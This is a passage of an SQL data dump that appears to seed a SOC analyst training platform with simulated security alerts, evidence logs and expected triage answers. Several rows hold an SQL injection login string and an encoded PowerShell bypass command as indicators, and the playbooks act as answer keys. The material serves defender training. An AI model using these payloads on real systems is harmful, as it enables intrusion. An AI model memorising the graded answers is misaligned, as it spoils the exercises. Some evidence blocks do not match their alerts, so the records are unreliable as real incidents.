1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.636Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T12:45:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://victimsite.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(952, 'C2 Communication Attempt Detected', 'critical', 'Firewall', 'Attempted communication with a known Command and Control server detected.', 'Malware', 'T1071', 1, 'Closed', 85, '{\"timestamp\":\"2026-01-16T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.55\",\"hostname\":\"server01\",\"domain\":\"maliciousc2.com\"}', '2026-01-16 13:12:47', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting C2 servers\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousc2.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain linked to C2 activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The connection attempt to a known C2 server confirms malicious activity.\"}', 'Novice', 'NDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(953, 'Failed Login Attempts from Internal Source', 'low', 'SIEM', 'Multiple failed login attempts detected from an internal IP address.', 'Brute Force', 'T1110', 0, 'closed', 159, '{\"timestamp\":\"2026-01-16T08:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.10\",\"username\":\"bsmith\",\"hostname\":\"laptop03\",\"failed_attempts\":5}', '2026-01-16 13:12:47', '2026-02-18 09:08:36', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"bsmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login attempts are from an internal IP and appear to be benign activity.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:31:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:30:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:29:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"},{\"timestamp\":\"2026-02-01T20:28:22.638Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T08:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"laptop03\\\",\\\"failed_attempts\\\":5}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(954, 'Script-Based Malware Detected', 'high', 'CrowdStrike', 'Execution of a script-based malware detected on a workstation.', 'Malware', 'T1059', 1, 'investigating', 145, '{\"timestamp\":\"2026-01-16T15:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"hostname\":\"workstation04\",\"command_line\":\"powershell -NoP -NonI -Exec Bypass -Enc ZQB4AGkAdAAgAC0AbwBuACA\"}', '2026-01-16 13:12:47', '2026-02-14 09:40:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell -NoP -NonI -Exec Bypass -Enc ZQB4AGkAdAAgAC0AbwBuACA\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicates malicious script execution\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands indicates malicious script execution.\"}', 'Novice', 'EDR', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(955, 'Suspicious Domain Access Detected', 'medium', 'Firewall', 'A request to a suspicious domain was made by a user on the internal network.', 'Web Request', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-16T13:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.60\",\"hostname\":\"laptop05\",\"domain\":\"unknown-domain.com\"}', '2026-01-16 13:12:47', '2026-02-16 17:36:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"unknown-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered and lacks reputation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain is new and lacks reputation but does not show malicious activity.\"}', 'Novice', 'CORE', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(956, 'Phishing Email with Suspicious Attachment', 'high', 'Proofpoint', 'A phishing email with a suspicious attachment was received.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T16:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.99\",\"username\":\"mjohnson\",\"email_sender\":\"fakebank@fraudulent.com\",\"filename\":\"invoice.pdf\"}', '2026-01-16 13:12:47', '2026-02-11 13:59:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fakebank@fraudulent.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Attachment known to contain malicious macros\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known malicious attachment, confirming phishing intent.\"}', 'Novice', 'CORE', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Suspicious Attachment\",\"date\":\"2026-02-01T20:32:22.642Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(957, 'Unauthorized Access Attempt Detected', 'medium', 'IDS/IPS', 'An unauthorized access attempt to a sensitive system was detected from an external IP.', 'Credential Attack', 'T1078', 1, 'Closed', 141, '{\"timestamp\":\"2026-01-16T17:55:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"secure-server\"}', '2026-01-16 13:12:47', '2026-02-12 04:25:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access attempt from a malicious IP to a sensitive system confirms the attack.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.643Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T17:55:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(958, 'External IP Port Scanning Detected', 'medium', 'Firewall', 'Port scanning activity detected from an external IP address.', 'Reconnaissance', 'T1046', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.1.0/24\",\"hostname\":\"null\"}', '2026-01-16 13:12:47', '2026-02-16 17:17:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for port scanning activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"reconnaissance\",\"analysis_notes\":\"The IP\'s history of port scanning confirms malicious reconnaissance activity.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(959, 'Benign User Behavior Mistaken as Anomalous', 'low', 'SIEM', 'Anomalous user behavior detected, but investigated and determined to be a benign anomaly.', 'Anomaly', 'T1087', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-16T19:10:00Z\",\"event_type\":\"user_behavior\",\"src_ip\":\"192.168.1.30\",\"username\":\"csmith\",\"hostname\":\"desktop06\",\"activity\":\"accessed large number of files\"}', '2026-01-16 13:12:47', '2026-02-15 05:05:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"csmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user with no history of malicious activity\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The activity was investigated and found to be normal work behavior.\"}', 'Novice', 'CORE', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.645Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-16T19:10:00Z\\\",\\\"event_type\\\":\\\"user_behavior\\\",\\\"src_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"csmith\\\",\\\"hostname\\\":\\\"desktop06\\\",\\\"activity\\\":\\\"accessed large number of files\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(960, 'Suspicious Remote Access Attempt Detected', 'high', 'Intrusion Detection System (IDS) Logs', 'An unauthorized access attempt was detected from an external IP leveraging a known vulnerability in Baltimore\'s remote access tool. The attacker tried to exploit the system using a tool associated with beginner-level cyber operations.', 'Initial Access', 'T1078.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:06Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"admin\",\"tool\":\"RemoteAccessTool_vulnerable\",\"attempt_result\":\"failed\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Unauthorized Access Attempt\",\"message\":\"Failed login attempt detected from external source using a known exploit.\"}', '2026-01-17 03:37:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of a server within the Baltimore network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Common hash associated with empty files.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Policy\",\"verdict\":\"suspicious\",\"details\":\"Default username often targeted in attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:06Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"admin\\\",\\\"tool\\\":\\\"RemoteAccessTool_vulnerable\\\",\\\"attempt_result\\\":\\\"failed\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"Unauthorized Access Attempt\\\",\\\"message\\\":\\\"Failed login attempt detected from external source using a known exploit.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.646Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 